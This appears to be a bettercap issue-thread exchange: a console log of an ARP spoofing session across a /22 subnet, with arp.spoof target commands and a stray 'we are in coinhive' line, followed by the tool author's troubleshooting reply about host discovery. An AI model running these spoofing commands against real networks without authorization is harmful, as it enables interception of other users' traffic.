[15:20:36] [sys.log] [inf] Checking latest stable release ...
[15:20:36] [endpoint.new] Endpoint 10.3.33.18 detected as 00:11:32:71:48:65 (Synology Incorporated).
[15:20:36] [sys.log] [inf] http.proxy started on 10.3.32.38:8080 (sslstrip disabled)
[15:20:36] [endpoint.new] Endpoint 10.3.32.49 detected as d4:90:9c:4e:fd:6b.
[15:20:36] [sys.log] [inf] You are running 2.5 which is the latest stable version.
[15:20:36] [endpoint.new] Endpoint 10.3.32.41 detected as 80:b0:3d:23:49:ed.
10.3.32.0/22 > 10.3.32.38  » [15:20:37] [sys.log] [inf] ARP spoofer started, probing 1024 targets.
10.3.32.0/22 > 10.3.32.38  » exit[15:20:38] [endpoint.new] Endpoint 10.3.32.121 detected as 78:4f:43:77:e2:82 (Apple).
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.33.135
10.3.32.0/22 > 10.3.32.38  » exit[15:20:44] [endpoint.new] Endpoint 10.3.32.79 detected as 8c:85:90:33:11:97.
10.3.32.0/22 > 10.3.32.38  » reload arp.spoof
[15:20:45] [sys.log] [inf] Waiting for ARP spoofer to stop ...
[15:20:46] [endpoint.lost] Endpoint 10.3.32.41 lost.
[15:20:51] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
[15:20:52] [endpoint.lost] Endpoint 10.3.32.49 lost.
[15:20:55] [endpoint.new] Endpoint 10.3.32.49 detected as d4:90:9c:4e:fd:6b.
[15:20:55] [endpoint.lost] Endpoint 10.3.32.79 lost.
10.3.32.0/22 > 10.3.32.38  » [15:20:55] [sys.log] [inf] ARP spoofer started, probing 1 targets.
10.3.32.0/22 > 10.3.32.38  » [15:20:56] [sys.log] [inf] we are in coinhive
10.3.32.0/22 > 10.3.32.38  » [15:20:57] [endpoint.lost] Endpoint 10.3.32.121 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » set arp.spoof.targets 10.3.32.0/22
10.3.32.0/22 > 10.3.32.38  » reload arp.spoof
[15:21:03] [sys.log] [inf] Waiting for ARP spoofer to stop ...
[15:21:04] [endpoint.lost] Endpoint 10.3.32.74 (Apple) lost.
[15:21:07] [endpoint.new] Endpoint 10.3.32.79 detected as 8c:85:90:33:11:97.
[15:21:08] [endpoint.new] Endpoint 10.3.32.32 detected as 2c:f0:a2:cd:0d:ac (Apple).
[15:21:10] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
10.3.32.0/22 > 10.3.32.38  » [15:21:13] [sys.log] [inf] ARP spoofer started, probing 1024 targets.
10.3.32.0/22 > 10.3.32.38  » [15:21:16] [endpoint.new] Endpoint 10.3.32.121 detected as 78:4f:43:77:e2:82 (Apple).
10.3.32.0/22 > 10.3.32.38  » [15:21:20] [endpoint.lost] Endpoint 10.3.32.32 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » [15:21:21] [endpoint.new] Endpoint 10.3.32.32 detected as 2c:f0:a2:cd:0d:ac (Apple).
10.3.32.0/22 > 10.3.32.38  » [15:21:22] [endpoint.lost] Endpoint 10.3.32.79 lost.
10.3.32.0/22 > 10.3.32.38  » [15:21:24] [endpoint.new] Endpoint 10.3.33.17 detected as 40:e2:30:25:7f:c1 (AzureWave Technology).
10.3.32.0/22 > 10.3.32.38  » [15:21:26] [endpoint.lost] Endpoint 10.3.32.121 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » [15:21:28] [endpoint.new] Endpoint 10.3.32.49 detected as d4:90:9c:4e:fd:6b.
10.3.32.0/22 > 10.3.32.38  » [15:21:29] [endpoint.lost] Endpoint 10.3.32.74 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » [15:21:31] [endpoint.lost] Endpoint 10.3.32.32 (Apple) lost.
10.3.32.0/22 > 10.3.32.38  » [15:21:33] [endpoint.new] Endpoint 10.3.32.74 detected as 2c:f0:ee:11:ec:d2 (Apple).
10.3.32.0/22 > 10.3.32.38  » [15:21:34] [endpoint.lost] Endpoint 10.3.33.17 (AzureWave Technology) lost.
10.3.32.0/22 > 10.3.32.38  » exit

[evilsocket]

I see the subnet is quite big, it might be the case you just need to wait a few seconds or minutes for the discoverer to pick it up (or temporarily net.probe on), when that happens you should see something like:

10.3.32.0/22 > 10.3.32.38 » [14:39:08] [sys.log] [dbg] Sending 60 bytes of ARP packet to 10.3.33.135:00:0c:29:ad:67:f8.